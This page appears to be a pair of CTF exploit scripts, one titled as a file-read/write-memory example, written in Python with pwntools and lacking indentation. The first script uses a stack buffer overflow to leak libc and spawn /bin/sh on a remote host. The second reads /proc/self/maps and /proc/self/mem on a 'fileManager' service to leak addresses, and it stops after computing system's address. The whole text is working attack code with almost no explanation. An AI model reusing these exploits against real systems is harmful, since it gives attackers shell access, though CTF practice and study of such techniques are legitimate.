文件读写内存实例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# level 3
for i in range(14):
attack()
change_host()
for i in range(3):
if LOCAL:
io2 = process('./play')
else:
io2 = remote('47.104.90.157', 30003)
name = 'B1rd'
io2.recvuntil('login:')
io2.sendline(name)
io2.recvuntil('choice>> ')
io2.close()
hacking(1)
attack2()
io.recvuntil('what\'s your name:')
elf = ELF('./play')
io.sendline('A' * 0x4c + p32(elf.plt['write']) + p32(0x80492C0) + p32(1) +
p32(elf.got['read']) + p32(4))
io.recvuntil('\n')
libc_addr = u32(io.recvn(4)) - libc.symbols['read']
log.info('libc_addr:%#x' % libc_addr)
system_addr = libc_addr + libc.symbols['system']
bin_sh = libc_addr + next(libc.search('/bin/sh'))
log.info('system_addr:%#x' % system_addr)
log.info('bin_sh:%#x' % bin_sh)
attack2()
io.recvuntil('what\'s your name:')
io.sendline('A' * 0x4c + p32(system_addr) + p32(0) + p32(bin_sh))
io.recv()
io.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
# -*- coding: UTF-8 -*-
from pwn import *
LOCAL = 0
DEBUG = 1
VERBOSE = 1
if VERBOSE:
context.log_level = 'debug'
if LOCAL:
io = process('./fileManager', aslr=False, env={'LD_PRELOAD':
'./libc.so.6'})
libc = ELF('./libc.so.6')
if DEBUG:
gdb.attach(io, 'b *0x56555F2C\n')
else:
io = remote('47.104.188.138', 30007)
libc = ELF('./libc.so.6')
def read_mod(name, offset, size):
io.recvuntil('\x87\xba\n')
io.sendline('1')
io.recvuntil('\xa7\xb0\x3a')
io.sendline(name)
io.recvuntil('\x87\x8f\x3a')
io.sendline(str(offset))
io.recvuntil('\xb0\x8f\x3a')
io.sendline(str(size))
io.recvuntil('\xae\xb9')
def write_mod(name, offset, size, content):
io.recvuntil('\x87\xba\n')
io.sendline('2')
io.recvuntil('\xa7\xb0\x3a')
io.sendline(name)
io.recvuntil('\x87\x8f\x3a')
io.sendline(str(offset))
io.recvuntil('\xb0\x8f\x3a')
io.sendline(str(size))
io.recvuntil('\x9d\x97\x3a')
io.send(content)
name = 'B1rd'
io.recvuntil('FTP:')
io.sendline(name)
read_mod('/proc/self/maps', 0, 0x100)
elf_base = int(io.recvn(8), 16)
log.info('elf_base:%#x' % elf_base)
elf = ELF('fileManager')
read_mod('/proc/self/mem', elf_base + elf.got['open'], 0x100)
libc_addr = u32(io.recvn(4)) - libc.symbols['open']
system_addr = libc_addr + libc.symbols['system']
log.info('libc_addr:%#x' % libc_addr)
log.info('system_addr:%#x' % system_addr)